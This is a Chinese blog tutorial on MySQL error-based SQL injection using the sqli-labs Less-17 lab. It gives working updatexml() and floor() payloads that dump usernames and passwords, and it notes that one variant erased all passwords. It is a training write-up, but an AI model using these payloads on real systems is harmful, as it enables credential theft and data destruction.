<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head><meta name="generator" content="Hexo 3.9.0">

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!--Description-->

    

    
        <meta name="description" content="I guess I just feel like......">
    

    <!--Author-->
    
        <meta name="author" content="Lofi_Shek">
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="error_based_injection">
    

    <!--Open Graph Description-->
    
        <meta property="og:description" content="I guess I just feel like......">
    

    <!--Open Graph Site Name-->
        <meta property="og:site_name" content="Lofi_Master">

    <!--Type page-->
    
        <meta property="og:type" content="article">
    

    <!--Page Cover-->
    
    
        <meta property="og:image" content="https://Lofi-S.github.iohttp://www.codeblocq.com/assets/projects/hexo-theme-clean-blog/img/home-bg.jpg">
    

        <meta name="twitter:card" content="summary_large_image">

    

    
        <meta name="twitter:image" content="https://Lofi-S.github.iohttp://www.codeblocq.com/assets/projects/hexo-theme-clean-blog/img/home-bg.jpg">
    

    <!-- Title -->
    
    <title>error_based_injection - Lofi_Master</title>

    <!-- Bootstrap Core CSS -->
    <link href="//maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" rel="stylesheet">

    <!-- Custom CSS -->
    <link rel="stylesheet" href="/css/style.css">

    <!-- Custom Fonts -->
    <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet" type="text/css">
    <link href="//fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css">
    <link href="//fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" rel="stylesheet" type="text/css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
    <script src="//oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
    <script src="//oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <!-- Gallery -->
    <link href="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.css" type="text/css" rel="stylesheet">

    <!-- Google Analytics -->
    


    <!-- favicon -->
    

</head>


<body>

    <!-- Menu -->
    <!-- Navigation -->
<nav class="navbar navbar-default navbar-custom navbar-fixed-top">
    <div class="container-fluid">
        <!-- Brand and toggle get grouped for better mobile display -->
        <div class="navbar-header page-scroll">
            <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1">
                <span class="sr-only">Toggle navigation</span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
            </button>
            <a class="navbar-brand" href="/">Configurable Title</a>
        </div>

        <!-- Collect the nav links, forms, and other content for toggling -->
        <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
            <ul class="nav navbar-nav navbar-right">
                
                    <li>
                        <a href="/">
                            
                                Home
                            
                        </a>
                    </li>
                
                    <li>
                        <a href="/archives">
                            
                                Archives
                            
                        </a>
                    </li>
                
                    <li>
                        <a href="/tags">
                            
                                Tags
                            
                        </a>
                    </li>
                
                    <li>
                        <a href="/categories">
                            
                                Categories
                            
                        </a>
                    </li>
                
                    <li>
                        <a href="https://github.com/Lofi-S/">
                            
                                <i class="fa fa-github fa-stack-2x"></i>
                            
                        </a>
                    </li>
                
            </ul>
        </div>
        <!-- /.navbar-collapse -->
    </div>
    <!-- /.container -->
</nav>

    <!-- Main Content -->
    <!-- Page Header -->
<!-- Set your background image for this header in your post front-matter: cover -->

<header class="intro-header" style="background-image: url('http://www.codeblocq.com/assets/projects/hexo-theme-clean-blog/img/home-bg.jpg')">
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <div class="post-heading">
                    <h1>error_based_injection</h1>
                    
                    <span class="meta">
                        <!-- Date and Author -->
                        
                        
                            2019-08-17
                        
                    </span>
                </div>
            </div>
        </div>
    </div>
</header>

<!-- Post Content -->
<article>
    <div class="container">
        <div class="row">

            <!-- Tags and categories -->
           

            <!-- Gallery -->
            

            <!-- Post Main Content -->
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <h1 id="MySQL报错注入"><a href="#MySQL报错注入" class="headerlink" title="MySQL报错注入"></a>MySQL报错注入</h1><p>这篇文章以sqli-labs-master平台的第17关Less17来说明报错注入的，这里主要讲解常见的三种报错注入方式，这种三种报错注入使用的报错注入函数分别为：floor()、updatexml()和extractvalue()。</p>
<hr>
<p>首先，我介绍一下Less17的情况，这一关是用update查询语句来重置用户密码的，打开less17页面后显示如下。</p>
<p><img src="/.io//1.png" alt></p>
<p>查看源代码发现后端对User Name的输入内容进行比较严格的过滤，所以我们选择在New Password的输入框中输入Payload。已知某一个用户为admin，其密码也为admin，所以我在两个输入框均输入admin，然后通过开启burp suite抓包再点击Submit按钮，得到如下请求包：</p>
<img src="/.io//08/17/error-based-injection/2.png" width="1">

<p>由上可见，这里使用的post请求方式，post部分内容分别使用了uname、passwd和submit三个变量来提交数据，放行后页面如下，表示修改重置密码成功。</p>
<p><img src="/.io//D:%5Cblog%5CLofiBlog%5Csource_posts%5Cerror-based-injection%5C3.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$update=&quot;UPDATE users SET password = &apos;$passwd&apos; WHERE username=&apos;$row1&apos;&quot;;</span><br></pre></td></tr></table></figure>

<p>上面是源代码中的SQL查询语句，对于update（或delete/insert）语句，我们可以通过<strong>or</strong>或者<strong>and</strong>布尔关键字衔接报错注入语句来构造一句完整的payload。</p>
<hr>
<h3 id="下面来介绍三种报错注入函数的原理及其使用："><a href="#下面来介绍三种报错注入函数的原理及其使用：" class="headerlink" title="下面来介绍三种报错注入函数的原理及其使用："></a>下面来介绍三种报错注入函数的原理及其使用：</h3><h4 id="1、updatexml-xml-target-xpath-expr-new-xml"><a href="#1、updatexml-xml-target-xpath-expr-new-xml" class="headerlink" title="1、updatexml(xml_target,xpath_expr,new_xml)"></a>1、updatexml(xml_target,xpath_expr,new_xml)</h4><table>
<thead>
<tr>
<th><strong>参数</strong></th>
<th><strong>描述</strong></th>
</tr>
</thead>
<tbody><tr>
<td>xml_target</td>
<td>目标xml，形式类似于节点目录</td>
</tr>
<tr>
<td>xpath_expr</td>
<td>xml的表达式（xpath格式）</td>
</tr>
<tr>
<td>new_xml</td>
<td>用来替换的xml</td>
</tr>
</tbody></table>
<p>作用：这是一个MySQL对xml文档数据进行查询和修改的函数。其实就是用new_xml把xml_target中包含xpath_expr的部分节点（包括xml_target的节点）替换掉。（具体不懂没关系，见下面的报错原理）</p>
<p>报错原理：updatexml()中第二个参数必须是xpath语法格式，若使用该函数时该参数不符合xpath格式则会报错，提示我们输入的内容有错，如 <em>XPATH syntax error:’xxx（第二个参数的内容）’</em> 。所以我们可以在第二个参数输入我们想要查询的数据来进行报错注入。</p>
<h4 id="updatexml-的常规报错用法"><a href="#updatexml-的常规报错用法" class="headerlink" title="updatexml()的常规报错用法"></a>updatexml()的常规报错用法</h4><p><strong>payload ：</strong></p>
<p> <em>‘ or updatexml(1,concat(‘#’,<strong>(select version() )</strong>,’#’),0)#</em></p>
<p>下图使用火狐浏览器的插件Hackbar来提交post数据：</p>
<p><img src="/.io//4.png" alt="4"></p>
<p>如下图，页面报错结果为：XPATH syntax error: ‘#5.5.53’。</p>
<p><img src="/.io//5.png" alt="5"></p>
<p>上面的payload是updatexml报错注入的常规模型，只需把加粗部分的内容改成想查看的数据的查询语句就能爆出想要的表中数据。</p>
<hr>
<p>这里要插入<strong>子查询</strong>和<strong>派生表</strong>的概念。<strong>子查询</strong>有两种：一是WHERE子查询；二是FROM子查询，而FROM这种子查询又被称为<strong>派生表</strong>。</p>
<hr>
<p><strong>payload1:</strong> </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos; or updatexml(1,concat(&apos;#&apos;,(select concat(id,&apos;#&apos;,username,&apos;#&apos;,password) from users limit 0,1)),0)#</span><br></pre></td></tr></table></figure>

<p><img src="/.io//6.png" alt="6"></p>
<p>结果：You can’t specify target table ‘users’ for update in FROM clause</p>
<p>这里我试图查询users表中的id、username和password的第一行数据，但这里却弹出错误提醒。</p>
<p>原因：根据报错意思，不能指定FROM子句中的users表来作为要UPDATE的表。完整的SQL语句如下：</p>
<p>UPDATE users SET password = ‘<strong><em>‘ or updatexml(1,concat(‘#’,(select concat(id,’#’,username,’#’,password) from users limit 0,1)),0) #</em></strong> ‘ WHERE username=’$row1’</p>
<p>解决方法：上述错误的具体的原理还不清楚，但是将select出的结果作为<strong>派生表</strong>（见下一个payload）再select一遍就没问题了，大家可以自己尝试一下。</p>
<p>【注意：此问题只出现于MySQL，msSQL和Oracle不会出现此问题。】</p>
<p> <strong>payload2:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos; or updatexml(1,concat(&apos;#&apos;,(select * from (select concat_ws(&apos;#&apos;,id,username,password) from users limit 0,1) a),&apos;#),0)#</span><br></pre></td></tr></table></figure>

<p><img src="/.io//7.png" alt="7"></p>
<p>结果：XPATH syntax error: ‘#1#Dumb#Dumb’，成功爆出数据（上面使用concat_ws()和concat()都可以）</p>
<p>解释：这里的<strong>a</strong>：<strong>(select concat_ws(‘#’,id,username,password) from users limit 0,1)</strong>就是<strong>派生表</strong>，而select * from a就相当于查询a语句本身结果的内容。</p>
<p>即“select concat_ws(‘#’,id,username,password) from users limit 0,1”等价于 “select * from a”。</p>
<h5 id="若想一次性输出全部数据，则使用group-concat-。"><a href="#若想一次性输出全部数据，则使用group-concat-。" class="headerlink" title="若想一次性输出全部数据，则使用group_concat()。"></a>若想一次性输出全部数据，则使用group_concat()。</h5><p><strong>payload3：</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos; or updatexml(1,concat(&apos;#&apos;,(select * from (select group_concat(id,&apos;#&apos;,username,&apos;#&apos;,password) from users limit 0,1) a) ),0)#</span><br></pre></td></tr></table></figure>

<p>结果：XPATH syntax error: ‘#1#Dumb#Dumb,2#Angelina#I-kill-y’。可见，这里只能爆出来（显示）前两组数据，而且第二行数据的password没有完整显示出来（完整密码是I-kill-you）。</p>
<p>【<strong>注意：updatexml()和extractvalue()这两个函数的报错返回长度有限,均为32个字符长度</strong>】</p>
<p><strong>另外要警告的一点是</strong>：这里我尝试把limit 0,1改成limit 1,1，执行后发现password字段的<strong>数据全部清空了！！！</strong></p>
<p>分析：</p>
<p>首先，由于这里使用了group_concat()，查询出来的结果本来就一条数据（包含了全部数据的），这里的limit 0,1就是指第一条（仅有的一条数据），而limit 1,1是指第二条数据（不存在的，相当于NULL），所以结果就是select * from NULL。</p>
<p>然后，因为<em>(select group_concat(id,’#’,username,’#’,password) from users limit 0,1) a</em>返回的就是NULL，导致<em>concat(‘#’,NULL,’#’)</em>返回的结果也是NULL，最后<em>updatexml(1,NULL,0)#</em>返回的也就是NULL。</p>
<p>最后，<strong>UPDATE users SET password = ‘<em>‘ or NULL #</em> ‘ WHERE username=’$row1’</strong> 相当于</p>
<p><strong>UPDATE users SET password = ‘’ or NULL</strong>，即把password字段的数据全部改为NULL，因为单引号中什么内容都没有所以密码数据全部被清空了。</p>
<p>实际上，这里用了group_concat()本身就不用加Limit 0,1关键字了！</p>
<p>【警告】<strong>updatexml()本身一个就是危险函数！！！</strong>请谨慎使用updatexml( )函数。</p>
<h4 id="2、extractvalue-xml-document-Xpath-string"><a href="#2、extractvalue-xml-document-Xpath-string" class="headerlink" title="2、extractvalue(xml_document, Xpath_string)"></a>2、extractvalue(xml_document, Xpath_string)</h4><h4 id="3、floor-、rand-、count"><a href="#3、floor-、rand-、count" class="headerlink" title="3、floor()、rand()、count(*)"></a>3、floor()、rand()、count(*)</h4><p>Payload（floor()的用法）:</p>
<p>‘ or (select 1 from (select count(<em>),concat_ws(‘-‘,(select concat_ws(‘-‘,id,username,password) from users limit 0,1),floor(rand()</em>2))as a from information_schema.tables group by a) b) where username=’admin’#</p>


                
            </div>

            <!-- Comments -->
            
                <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                    


                </div>
            
        </div>
    </div>
</article>

    <!-- Footer -->
    <hr />

<!-- Footer -->
<footer>
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <ul class="list-inline text-center">
                    

                    

                    
                        <li>
                            <a href="https://github.com/Lofi-S/" target="_blank">
                                <span class="fa-stack fa-lg">
                                    <i class="fa fa-circle fa-stack-2x"></i>
                                    <i class="fa fa-github fa-stack-1x fa-inverse"></i>
                                </span>
                            </a>
                        </li>
                    

                    

                    

                    
                </ul>
                <p class="copyright text-muted">&copy; 2019 Lofi_Shek<br></p>
                <p class="copyright text-muted">Original Theme <a target="_blank" href="http://startbootstrap.com/template-overviews/clean-blog/">Clean Blog</a> from <a href="http://startbootstrap.com/" target="_blank">Start Bootstrap</a></p>
                <p class="copyright text-muted">Adapted for <a target="_blank" href="https://hexo.io/">Hexo</a> by <a href="http://www.codeblocq.com/" target="_blank">Jonathan Klughertz</a></p>
            </div>
        </div>
    </div>
</footer>


    <!-- After footer scripts -->
    
<!-- jQuery -->
<script src="//code.jquery.com/jquery-2.1.4.min.js"></script>

<!-- Bootstrap -->
<script src="//maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>

<!-- Gallery -->
<script src="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.js" type="text/javascript" charset="utf-8"></script>

<!-- Disqus Comments -->



</body>

</html>